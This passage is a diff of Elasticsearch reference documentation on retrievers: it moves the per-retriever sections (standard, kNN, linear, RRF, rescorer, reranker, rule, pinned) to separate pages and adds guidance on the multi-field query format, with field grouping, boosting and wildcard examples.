(RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). `rule` -: A [retriever](#rule-retriever) that applies contextual [Searching with query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. - -## Standard Retriever [standard-retriever] - -A standard retriever returns top documents from a traditional [query](/reference/query-languages/querydsl.md). - - -#### Parameters: [standard-retriever-parameters] - -`query` -: (Optional, [query object](/reference/query-languages/querydsl.md)) - - Defines a query to retrieve a set of top documents. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to this retriever, where all documents must match this query but do not contribute to the score. +: The [rule](retrievers/rule-retriever.md) retriever applies contextual [Searching with query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. +`standard` +: The [standard](retrievers/standard-retriever.md) retriever replaces the functionality of a traditional [query](/reference/query-languages/querydsl.md). -`search_after` -: (Optional, [search after object](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after)) - - Defines a search after object parameter used for pagination. - - -`terminate_after` -: (Optional, integer) Maximum number of documents to collect for each shard. If a query reaches this limit, {{es}} terminates the query early. {{es}} collects documents before sorting. - - ::::{important} - Use with caution. {{es}} applies this parameter to each shard handling the request. When possible, let {{es}} perform early termination automatically. Avoid specifying this parameter for requests that target data streams with backing indices across multiple data tiers. 
- ::::
-

-`sort`
-: (Optional, [sort object](/reference/elasticsearch/rest-apis/sort-search-results.md)) A sort object that specifies the order of matching documents.

+## Common usage guidelines [retriever-common-parameters]

-`min_score`
-: (Optional, `float`)

+### Using `from` and `size` with a retriever tree [retriever-size-pagination]

-    Minimum [`_score`](/reference/query-languages/query-dsl/query-filter-context.md#relevance-scores) for matching documents. Documents with a lower `_score` are not included in the top documents.
+The [`from`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-from-param) and [`size`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param) parameters are provided globally as part of the general [search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search). They are applied to all retrievers in a retriever tree, unless a specific retriever overrides the `size` parameter using a different parameter such as `rank_window_size`. However, the final search hits are always limited to `size`.

-`collapse`
-: (Optional, [collapse object](/reference/elasticsearch/rest-apis/collapse-search-results.md))

+### Using aggregations with a retriever tree [retriever-aggregations]

-    Collapses the top documents by a specified key into a single top document per key.
+[Aggregations](/reference/aggregations/index.md) are globally specified as part of a search request. The query used for an aggregation is the combination of all leaf retrievers as `should` clauses in a [boolean query](/reference/query-languages/query-dsl/query-dsl-bool-query.md).

-### Restrictions [_restrictions]
+### Restrictions on search parameters when specifying a retriever [retriever-restrictions]

-When a retriever tree contains a compound retriever (a retriever with two or more child retrievers) the [search after](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after) parameter is not supported.
+When a retriever is specified as part of a search, the following elements are not allowed at the top-level:

+* [`query`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-query)
+* [`knn`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn)
+* [`search_after`](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after)
+* [`terminate_after`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-terminate-after)
+* [`sort`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-sort-param)
+* [`rescore`](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) (use a [rescorer retriever](retrievers/rescorer-retriever.md) instead)


-### Example [standard-retriever-example]

-```console
-GET /restaurants/_search
-{
-  "retriever": { <1>
-    "standard": { <2>
-      "query": { <3>
-        "bool": { <4>
-          "should": [ <5>
-            {
-              "match": { <6>
-                "region": "Austria"
-              }
-            }
-          ],
-          "filter": [ <7>
-            {
-              "term": { <8>
-                "year": "2019" <9>
-              }
-            }
-          ]
-        }
-      }
-    }
-  }
-}
-```

+## Multi-field query format [multi-field-query-format]

+```yaml {applies_to}
+stack: ga 9.1
+```
1. 
Opens the `retriever` object.
-2. The `standard` retriever is used for defining traditional {{es}} queries.
-3. The entry point for defining the search query.
-4. The `bool` object allows for combining multiple query clauses logically.
-5. The `should` array indicates conditions under which a document will match. Documents matching these conditions will have increased relevancy scores.
-6. The `match` object finds documents where the `region` field contains the word "Austria."
-7. The `filter` array provides filtering conditions that must be met but do not contribute to the relevancy score.
-8. The `term` object is used for exact matches, in this case, filtering documents by the `year` field.
-9. The exact value to match in the `year` field.
-
-
-
-
-## kNN Retriever [knn-retriever]
-
-A kNN retriever returns top documents from a [k-nearest neighbor search (kNN)](docs-content://solutions/search/vector/knn.md).
-
-
-#### Parameters [knn-retriever-parameters]
-
-`field`
-: (Required, string)
-
-    The name of the vector field to search against. Must be a [`dense_vector` field with indexing enabled](/reference/elasticsearch/mapping-reference/dense-vector.md#index-vectors-knn-search).
-
-
-`query_vector`
-: (Required if `query_vector_builder` is not defined, array of `float`)
-
-    Query vector. Must have the same number of dimensions as the vector field you are searching against. Must be either an array of floats or a hex-encoded byte vector.
-
-
-`query_vector_builder`
-: (Required if `query_vector` is not defined, query vector builder object)
-
-    Defines a [model](docs-content://solutions/search/vector/knn.md#knn-semantic-search) to build a query vector.
+The [`linear`](retrievers/linear-retriever.md) and [`rrf`](retrievers/rrf-retriever.md) retrievers support a multi-field query format that provides a simplified way to define searches across multiple fields without explicitly specifying inner retrievers.
+This format automatically generates appropriate inner retrievers based on the field types and query parameters.
+This is a convenient way to search an index when you know little or nothing about its schema, while also handling normalization across lexical and semantic matches.

+### Field grouping [multi-field-field-grouping]

-`k`
-: (Required, integer)

-    Number of nearest neighbors to return as top hits. This value must be fewer than or equal to `num_candidates`.
+The multi-field query format groups queried fields into two categories:

+- **Lexical fields**: fields that support term queries, such as `keyword` and `text` fields.
+- **Semantic fields**: [`semantic_text` fields](/reference/elasticsearch/mapping-reference/semantic-text.md).

+Each field group is queried separately and the scores/ranks are normalized such that each contributes 50% to the final score/rank.
+This balances the importance of lexical and semantic fields.
+Most indices contain more lexical than semantic fields, and without this grouping the results would often be biased towards lexical field matches.

-`num_candidates`
-: (Required, integer)

-    The number of nearest neighbor candidates to consider per shard. Needs to be greater than `k`, or `size` if `k` is omitted, and cannot exceed 10,000. {{es}} collects `num_candidates` results from each shard, then merges them to find the top `k` results. Increasing `num_candidates` tends to improve the accuracy of the final `k` results. Defaults to `Math.min(1.5 * k, 10_000)`. 
- - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Query to filter the documents that can match. The kNN search will return the top `k` documents that also match this filter. The value can be a single query or a list of queries. If `filter` is not provided, all documents are allowed to match. - - -`similarity` -: (Optional, float) - - The minimum similarity required for a document to be considered a match. The similarity value calculated relates to the raw [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) used. Not the document score. The matched documents are then scored according to [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) and the provided `boost` is applied. - - The `similarity` parameter is the direct vector similarity calculation. - - * `l2_norm`: also known as Euclidean, will include documents where the vector is within the `dims` dimensional hypersphere with radius `similarity` with origin at `query_vector`. - * `cosine`, `dot_product`, and `max_inner_product`: Only return vectors where the cosine similarity or dot-product are at least the provided `similarity`. - - Read more here: [knn similarity search](docs-content://solutions/search/vector/knn.md#knn-similarity-search) - - -`rescore_vector` -: (Optional, object) Apply oversampling and rescoring to quantized vectors. - -::::{note} -Rescoring only makes sense for quantized vectors; when [quantization](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-quantization) is not used, the original vectors are used for scoring. Rescore option will be ignored for non-quantized `dense_vector` fields. +::::{warning} +In the `linear` retriever, this grouping relies on using a normalizer other than `none` (i.e., `minmax` or `l2_norm`). +If you use the `none` normalizer, the scores across field groups will not be normalized and the results may be biased towards lexical field matches. :::: +### Linear retriever field boosting [multi-field-field-boosting] -`oversample` -: (Required, float) - - Applies the specified oversample factor to `k` on the approximate kNN search. The approximate kNN search will: - - * Retrieve `num_candidates` candidates per shard. - * From these candidates, the top `k * oversample` candidates per shard will be rescored using the original vectors. - * The top `k` rescored candidates will be returned. - - -See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. - - -### Restrictions [_restrictions_2] - -The parameters `query_vector` and `query_vector_builder` cannot be used together. - - -### Example [knn-retriever-example] +When using the `linear` retriever, fields can be boosted using the `^` notation: ```console -GET /restaurants/_search +GET books/_search { "retriever": { - "knn": { <1> - "field": "vector", <2> - "query_vector": [10, 22, 77], <3> - "k": 10, <4> - "num_candidates": 10 <5> - } - } -} -``` - -1. Configuration for k-nearest neighbor (knn) search, which is based on vector similarity. -2. Specifies the field name that contains the vectors. -3. The query vector against which document vectors are compared in the `knn` search. -4. The number of nearest neighbors to return as top hits. This value must be fewer than or equal to `num_candidates`. -5. 
The size of the initial candidate set from which the final `k` nearest neighbors are selected. - - - - -## Linear Retriever [linear-retriever] - -A retriever that normalizes and linearly combines the scores of other retrievers. - - -#### Parameters [linear-retriever-parameters] - -`retrievers` -: (Required, array of objects) - - A list of the sub-retrievers' configuration, that we will take into account and whose result sets we will merge through a weighted sum. Each configuration can have a different weight and normalization depending on the specified retriever. - - -Each entry specifies the following parameters: - -`retriever` -: (Required, a `retriever` object) - - Specifies the retriever for which we will compute the top documents for. The retriever will produce `rank_window_size` results, which will later be merged based on the specified `weight` and `normalizer`. - -`weight` -: (Optional, float) - - The weight that each score of this retriever’s top docs will be multiplied with. Must be greater or equal to 0. Defaults to 1.0. - -`normalizer` -: (Optional, String) - - - Specifies how we will normalize the retriever’s scores, before applying the specified `weight`. Available values are: `minmax`, `l2_norm`, and `none`. Defaults to `none`. - - * `none` - * `minmax` : A `MinMaxScoreNormalizer` that normalizes scores based on the following formula - - ``` - score = (score - min) / (max - min) - ``` - - * `l2_norm` : An `L2ScoreNormalizer` that normalizes scores using the L2 norm of the score values. - -See also [this hybrid search example](docs-content://solutions/search/retrievers-examples.md#retrievers-examples-linear-retriever) using a linear retriever on how to independently configure and apply normalizers to retrievers. - -`rank_window_size` -: (Optional, integer) - - This value determines the size of the individual result sets per query. A higher value will improve result relevance at the cost of performance. The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param). `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`. Defaults to the `size` parameter. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications. - - - -## RRF Retriever [rrf-retriever] - -An [RRF](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md) retriever returns top documents based on the RRF formula, equally weighting two or more child retrievers. Reciprocal rank fusion (RRF) is a method for combining multiple result sets with different relevance indicators into a single result set. - - -#### Parameters [rrf-retriever-parameters] - -`retrievers` -: (Required, array of retriever objects) - - A list of child retrievers to specify which sets of returned top documents will have the RRF formula applied to them. Each child retriever carries an equal weight as part of the RRF formula. Two or more child retrievers are required. - - -`rank_constant` -: (Optional, integer) - - This value determines how much influence documents in individual result sets per query have over the final ranked result set. A higher value indicates that lower ranked documents have more influence. This value must be greater than or equal to `1`. 
Defaults to `60`. - - -`rank_window_size` -: (Optional, integer) - - This value determines the size of the individual result sets per query. A higher value will improve result relevance at the cost of performance. The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param). `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`. Defaults to the `size` parameter. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications. - - - -### Example: Hybrid search [rrf-retriever-example-hybrid] - -A simple hybrid search example (lexical search + dense vector search) combining a `standard` retriever with a `knn` retriever using RRF: - -```console -GET /restaurants/_search -{ - "retriever": { - "rrf": { <1> - "retrievers": [ <2> - { - "standard": { <3> - "query": { - "multi_match": { - "query": "Austria", - "fields": [ - "city", - "region" - ] - } - } - } - }, - { - "knn": { <4> - "field": "vector", - "query_vector": [10, 22, 77], - "k": 10, - "num_candidates": 10 - } - } + "linear": { + "query": "elasticsearch", + "fields": [ + "title^3", <1> + "description^2", <2> + "title_semantic", <3> + "description_semantic^2" ], - "rank_constant": 1, <5> - "rank_window_size": 50 <6> + "normalizer": "minmax" } } } ``` -1. Defines a retriever tree with an RRF retriever. -2. The sub-retriever array. -3. The first sub-retriever is a `standard` retriever. -4. The second sub-retriever is a `knn` retriever. -5. The rank constant for the RRF retriever. -6. The rank window size for the RRF retriever. - +1. 3x weight +2. 2x weight +3. 1x weight (default) +Due to how the [field group scores](#multi-field-field-grouping) are normalized, per-field boosts have no effect on the range of the final score. +Instead, they affect the importance of the field's score within its group. -### Example: Hybrid search with sparse vectors [rrf-retriever-example-hybrid-sparse] - -A more complex hybrid search example (lexical search + ELSER sparse vector search + dense vector search) using RRF: +For example, if the schema looks like: ```console -GET movies/_search +PUT /books { - "retriever": { - "rrf": { - "retrievers": [ - { - "standard": { - "query": { - "sparse_vector": { - "field": "plot_embedding", - "inference_id": "my-elser-model", - "query": "films that explore psychological depths" - } - } - } - }, - { - "standard": { - "query": { - "multi_match": { - "query": "crime", - "fields": [ - "plot", - "title" - ] - } - } - } - }, - { - "knn": { - "field": "vector", - "query_vector": [10, 22, 77], - "k": 10, - "num_candidates": 10 - } - } - ] - } - } -} -``` - - -## Rescorer Retriever [rescorer-retriever] - -The `rescorer` retriever re-scores only the results produced by its child retriever. For the `standard` and `knn` retrievers, the `window_size` parameter specifies the number of documents examined per shard. - -For compound retrievers like `rrf`, the `window_size` parameter defines the total number of documents examined globally. 
- -When using the `rescorer`, an error is returned if the following conditions are not met: - -* The minimum configured rescore’s `window_size` is: - - * Greater than or equal to the `size` of the parent retriever for nested `rescorer` setups. - * Greater than or equal to the `size` of the search request when used as the primary retriever in the tree. - -* And the maximum rescore’s `window_size` is: - - * Smaller than or equal to the `size` or `rank_window_size` of the child retriever. - - - -#### Parameters [rescorer-retriever-parameters] - -`rescore` -: (Required. [A rescorer definition or an array of rescorer definitions](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore)) - - Defines the [rescorers](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) applied sequentially to the top documents returned by the child retriever. - - -`retriever` -: (Required. `retriever`) - - Specifies the child retriever responsible for generating the initial set of top documents to be re-ranked. - - -`filter` -: (Optional. [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the retriever, ensuring that all documents match the filter criteria without affecting their scores. - - - -### Example [rescorer-retriever-example] - -The `rescorer` retriever can be placed at any level within the retriever tree. The following example demonstrates a `rescorer` applied to the results produced by an `rrf` retriever: - -```console -GET movies/_search -{ - "size": 10, <1> - "retriever": { - "rescorer": { <2> - "rescore": { - "window_size": 50, <3> - "query": { <4> - "rescore_query": { - "script_score": { - "query": { - "match_all": {} - }, - "script": { - "source": "cosineSimilarity(params.queryVector, 'product-vector_final_stage') + 1.0", - "params": { - "queryVector": [-0.5, 90.0, -10, 14.8, -156.0] - } - } - } - } - } + "mappings": { + "properties": { + "title": { + "type": "text", + "copy_to": "title_semantic" + }, + "description": { + "type": "text", + "copy_to": "description_semantic" }, - "retriever": { <5> - "rrf": { - "rank_window_size": 100, <6> - "retrievers": [ - { - "standard": { - "query": { - "sparse_vector": { - "field": "plot_embedding", - "inference_id": "my-elser-model", - "query": "films that explore psychological depths" - } - } - } - }, - { - "standard": { - "query": { - "multi_match": { - "query": "crime", - "fields": [ - "plot", - "title" - ] - } - } - } - }, - { - "knn": { - "field": "vector", - "query_vector": [10, 22, 77], - "k": 10, - "num_candidates": 10 - } - } - ] - } + "title_semantic": { + "type": "semantic_text" + }, + "description_semantic": { + "type": "semantic_text" } } } } ``` -1. Specifies the number of top documents to return in the final response. -2. A `rescorer` retriever applied as the final step. -3. Defines the number of documents to rescore from the child retriever. -4. The definition of the `query` rescorer. -5. Specifies the child retriever definition. -6. Defines the number of documents returned by the `rrf` retriever, which limits the available documents to - - - -## Text Similarity Re-ranker Retriever [text-similarity-reranker-retriever] - -The `text_similarity_reranker` retriever uses an NLP model to improve search results by reordering the top-k documents based on their semantic similarity to the query. 
- -::::{tip} -Refer to [*Semantic re-ranking*](docs-content://solutions/search/ranking/semantic-reranking.md) for a high level overview of semantic re-ranking. - -:::: - - -### Prerequisites [_prerequisites_15] - -To use `text_similarity_reranker`, you can rely on the preconfigured `.rerank-v1-elasticsearch` inference endpoint, which uses the [Elastic Rerank model](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) and serves as the default if no `inference_id` is provided. This model is optimized for reranking based on text similarity. If you'd like to use a different model, you can set up a custom inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). The endpoint should be configured with a machine learning model capable of computing text similarity. Refer to [the Elastic NLP model reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third-party text similarity models supported by {{es}}. - -You have the following options: - -* Use the built-in [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) cross-encoder model via the inference API’s {{es}} service. See [this example](https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elasticsearch.html#inference-example-elastic-reranker) for creating an endpoint using the Elastic Rerank model. -* Use the [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. -* Use the [Google Vertex AI inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. -* Upload a model to {{es}} with [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch) using the `text_similarity` NLP task type. - - * Then set up an [{{es}} service inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. - * Refer to the [example](#text-similarity-reranker-retriever-example-eland) on this page for a step-by-step guide. - - -::::{important} -Scores from the re-ranking process are normalized using the following formula before returned to the user, to avoid having negative scores. - -```text -score = max(score, 0) + min(exp(score), 1) -``` - -Using the above, any initially negative scores are projected to (0, 1) and positive scores to [1, infinity). To revert back if needed, one can use: - -```text -score = score - 1, if score >= 0 -score = ln(score), if score < 0 -``` - -:::: - - - -#### Parameters [text-similarity-reranker-retriever-parameters] - -`retriever` -: (Required, `retriever`) - - The child retriever that generates the initial set of top documents to be re-ranked. - - -`field` -: (Required, `string`) - - The document field to be used for text similarity comparisons. This field should contain the text that will be evaluated against the `inferenceText`. - - -`inference_id` -: (Optional, `string`) - - Unique identifier of the inference endpoint created using the {{infer}} API. If you don’t specify an inference endpoint, the `inference_id` field defaults to `.rerank-v1-elasticsearch`, a preconfigured endpoint for the elasticsearch `.rerank-v1` model. - - -`inference_text` -: (Required, `string`) - - The text snippet used as the basis for similarity comparison. 
- - -`rank_window_size` -: (Optional, `int`) - - The number of top documents to consider in the re-ranking process. Defaults to `10`. - - -`min_score` -: (Optional, `float`) - - Sets a minimum threshold score for including documents in the re-ranked results. Documents with similarity scores below this threshold will be excluded. Note that score calculations vary depending on the model used. - - -`filter` -: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) - - Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the child `retriever`. If the child retriever already specifies any filters, then this top-level filter is applied in conjuction with the filter defined in the child retriever. - - - -### Example: Elastic Rerank [text-similarity-reranker-retriever-example-elastic-rerank] - -::::{tip} -Refer to this [Python notebook](https://github.com/elastic/elasticsearch-labs/blob/main/notebooks/search/12-semantic-reranking-elastic-rerank.ipynb) for an end-to-end example using Elastic Rerank. - -:::: - - -This example demonstrates how to deploy the [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) model and use it to re-rank search results using the `text_similarity_reranker` retriever. - -Follow these steps: - -1. Create an inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). - - ```console - PUT _inference/rerank/my-elastic-rerank - { - "service": "elasticsearch", - "service_settings": { - "model_id": ".rerank-v1", - "num_threads": 1, - "adaptive_allocations": { <1> - "enabled": true, - "min_number_of_allocations": 1, - "max_number_of_allocations": 10 - } - } - } - ``` - - 1. [Adaptive allocations](docs-content://deploy-manage/autoscaling/trained-model-autoscaling.md#enabling-autoscaling-through-apis-adaptive-allocations) will be enabled with the minimum of 1 and the maximum of 10 allocations. - -2. Define a `text_similarity_rerank` retriever: - - ```console - POST _search - { - "retriever": { - "text_similarity_reranker": { - "retriever": { - "standard": { - "query": { - "match": { - "text": "How often does the moon hide the sun?" - } - } - } - }, - "field": "text", - "inference_id": "my-elastic-rerank", - "inference_text": "How often does the moon hide the sun?", - "rank_window_size": 100, - "min_score": 0.5 - } - } - } - ``` - - - -### Example: Cohere Rerank [text-similarity-reranker-retriever-example-cohere] - -This example enables out-of-the-box semantic search by re-ranking top documents using the Cohere Rerank API. This approach eliminates the need to generate and store embeddings for all indexed documents. This requires a [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) that is set up for the `rerank` task type. 
+And we run this query: ```console -GET /index/_search -{ - "retriever": { - "text_similarity_reranker": { - "retriever": { - "standard": { - "query": { - "match_phrase": { - "text": "landmark in Paris" - } - } - } - }, - "field": "text", - "inference_id": "my-cohere-rerank-model", - "inference_text": "Most famous landmark in Paris", - "rank_window_size": 100, - "min_score": 0.5 - } - } -} -``` - - -### Example: Semantic re-ranking with a Hugging Face model [text-similarity-reranker-retriever-example-eland] - -The following example uses the `cross-encoder/ms-marco-MiniLM-L-6-v2` model from Hugging Face to rerank search results based on semantic similarity. The model must be uploaded to {{es}} using [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch). - -::::{tip} -Refer to [the Elastic NLP model reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third party text similarity models supported by {{es}}. - -:::: - - -Follow these steps to load the model and create a semantic re-ranker. - -1. Install Eland using `pip` - - ```sh - python -m pip install eland[pytorch] - ``` - -2. Upload the model to {{es}} using Eland. This example assumes you have an Elastic Cloud deployment and an API key. Refer to the [Eland documentation](eland://reference/machine-learning.md#ml-nlp-pytorch-auth) for more authentication options. - - ```sh - eland_import_hub_model \ - --cloud-id $CLOUD_ID \ - --es-api-key $ES_API_KEY \ - --hub-model-id cross-encoder/ms-marco-MiniLM-L-6-v2 \ - --task-type text_similarity \ - --clear-previous \ - --start - ``` - -3. Create an inference endpoint for the `rerank` task - - ```console - PUT _inference/rerank/my-msmarco-minilm-model - { - "service": "elasticsearch", - "service_settings": { - "num_allocations": 1, - "num_threads": 1, - "model_id": "cross-encoder__ms-marco-minilm-l-6-v2" - } - } - ``` - -4. Define a `text_similarity_rerank` retriever. - - ```console - POST movies/_search - { - "retriever": { - "text_similarity_reranker": { - "retriever": { - "standard": { - "query": { - "match": { - "genre": "drama" - } - } - } - }, - "field": "plot", - "inference_id": "my-msmarco-minilm-model", - "inference_text": "films that explore psychological depths" - } - } - } - ``` - - This retriever uses a standard `match` query to search the `movie` index for films tagged with the genre "drama". It then re-ranks the results based on semantic similarity to the text in the `inference_text` parameter, using the model we uploaded to {{es}}. - - - - -## Query Rules Retriever [rule-retriever] - -The `rule` retriever enables fine-grained control over search results by applying contextual [query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. This retriever has similar functionality to the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md), but works out of the box with other retrievers. - -### Prerequisites [_prerequisites_16] - -To use the `rule` retriever you must first create one or more query rulesets using the [query rules management APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules). - - -#### Parameters [rule-retriever-parameters] - -`retriever` -: (Required, `retriever`) - - The child retriever that returns the results to apply query rules on top of. 
This can be a standalone retriever such as the [standard](#standard-retriever) or [knn](#knn-retriever) retriever, or it can be a compound retriever. - - -`ruleset_ids` -: (Required, `array`) - - An array of one or more unique [query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) IDs with query-based rules to match and apply as applicable. Rulesets and their associated rules are evaluated in the order in which they are specified in the query and ruleset. The maximum number of rulesets to specify is 10. - - -`match_criteria` -: (Required, `object`) - - Defines the match criteria to apply to rules in the given query ruleset(s). Match criteria should match the keys defined in the `criteria.metadata` field of the rule. - - -`rank_window_size` -: (Optional, `int`) - - The number of top documents to return from the `rule` retriever. Defaults to `10`. - - - -### Example: Rule retriever [rule-retriever-example] - -This example shows the rule retriever executed without any additional retrievers. It runs the query defined by the `retriever` and applies the rules from `my-ruleset` on top of the returned results. - -```console -GET movies/_search +GET books/_search { "retriever": { - "rule": { - "match_criteria": { - "query_string": "harry potter" - }, - "ruleset_ids": [ - "my-ruleset" + "linear": { + "query": "elasticsearch", + "fields": [ + "title", + "description", + "title_semantic", + "description_semantic" ], - "retriever": { - "standard": { - "query": { - "query_string": { - "query": "harry potter" - } - } - } - } + "normalizer": "minmax" } } } ``` +The score breakdown would be: -### Example: Rule retriever combined with RRF [rule-retriever-example-rrf] - -This example shows how to combine the `rule` retriever with other rerank retrievers such as [rrf](#rrf-retriever) or [text_similarity_reranker](#text-similarity-reranker-retriever). - -::::{warning} -The `rule` retriever will apply rules to any documents returned from its defined `retriever` or any of its sub-retrievers. This means that for the best results, the `rule` retriever should be the outermost defined retriever. Nesting a `rule` retriever as a sub-retriever under a reranker such as `rrf` or `text_similarity_reranker` may not produce the expected results. - -:::: +* Lexical fields (50% of score): + * `title`: 50% of lexical fields group score, 25% of final score + * `description`: 50% of lexical fields group score, 25% of final score +* Semantic fields (50% of score): + * `title_semantic`: 50% of semantic fields group score, 25% of final score + * `description_semantic`: 50% of semantic fields group score, 25% of final score +If we apply per-field boosts like so: ```console -GET movies/_search +GET books/_search { "retriever": { - "rule": { <1> - "match_criteria": { - "query_string": "harry potter" - }, - "ruleset_ids": [ - "my-ruleset" + "linear": { + "query": "elasticsearch", + "fields": [ + "title^3", + "description^2", + "title_semantic", + "description_semantic^2" ], - "retriever": { - "rrf": { <2> - "retrievers": [ - { - "standard": { - "query": { - "query_string": { - "query": "sorcerer's stone" - } - } - } - }, - { - "standard": { - "query": { - "query_string": { - "query": "chamber of secrets" - } - } - } - } - ] - } - } + "normalizer": "minmax" } } } ``` -1. The `rule` retriever is the outermost retriever, applying rules to the search results that were previously reranked using the `rrf` retriever. -2. 
The `rrf` retriever returns results from all of its sub-retrievers, and the output of the `rrf` retriever is used as input to the `rule` retriever. - -## Pinned Retriever [pinned-retriever] -```yaml {applies_to} -stack: ga 9.1 -``` - - -A `pinned` retriever returns top documents by always placing specific documents at the top of the results, with the remaining hits provided by a secondary retriever. This retriever offers similar functionality to the [pinned query](/reference/query-languages/query-dsl/query-dsl-pinned-query.md), but works seamlessly with other retrievers. This is useful for promoting certain documents for particular queries, regardless of their relevance score. - -#### Parameters [pinned-retriever-parameters] - -`ids` -: (Optional, array of strings) - - A list of document IDs to pin at the top of the results, in the order provided. - -`docs` -: (Optional, array of objects) - - A list of objects specifying documents to pin. Each object must contain at least an `_id` field, and may also specify `_index` if pinning documents across multiple indices. +The score breakdown would change to: -`retriever` -: (Optional, retriever object) +* Lexical fields (50% of score): + * `title`: 60% of lexical fields group score, 30% of final score + * `description`: 40% of lexical fields group score, 20% of final score +* Semantic fields (50% of score): + * `title_semantic`: 33% of semantic fields group score, 16.5% of final score + * `description_semantic`: 66% of semantic fields group score, 33% of final score - A retriever (for example a `standard` retriever or a specialized retriever such as `rrf` retriever) used to retrieve the remaining documents after the pinned ones. +### Wildcard field patterns [multi-field-wildcard-field-patterns] -Either `ids` or `docs` must be specified. - -### Example using `docs` [pinned-retriever-example-documents] +Field names support the `*` wildcard character to match multiple fields: ```console -GET /restaurants/_search +GET books/_search { "retriever": { - "pinned": { - "docs": [ - { "_id": "doc1", "_index": "my-index" }, - { "_id": "doc2" } - ], - "retriever": { - "standard": { - "query": { - "match": { - "title": "elasticsearch" - } - } - } - } + "rrf": { + "query": "machine learning", + "fields": [ + "title*", <1> + "*_text" <2> + ] } } } ``` -## Common usage guidelines [retriever-common-parameters] +1. Match fields that start with `title` +2. Match fields that end with `_text` +Note, however, that wildcard field patterns will only resolve to fields that either: -### Using `from` and `size` with a retriever tree [retriever-size-pagination] +- Support term queries, such as `keyword` and `text` fields +- Are `semantic_text` fields -The [`from`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-from-param) and [`size`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param) parameters are provided globally as part of the general [search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search). They are applied to all retrievers in a retriever tree, unless a specific retriever overrides the `size` parameter using a different parameter such as `rank_window_size`. Though, the final search hits are always limited to `size`. 
+### Limitations
+
+- **Single index**: Multi-field queries currently work with single index searches only
+- **CCS (Cross Cluster Search)**: Multi-field queries do not support remote cluster searches
 
-### Using aggregations with a retriever tree [retriever-aggregations]
-
-[Aggregations](/reference/aggregations/index.md) are globally specified as part of a search request. The query used for an aggregation is the combination of all leaf retrievers as `should` clauses in a [boolean query](/reference/query-languages/query-dsl/query-dsl-bool-query.md).
 
+### Examples
 
-
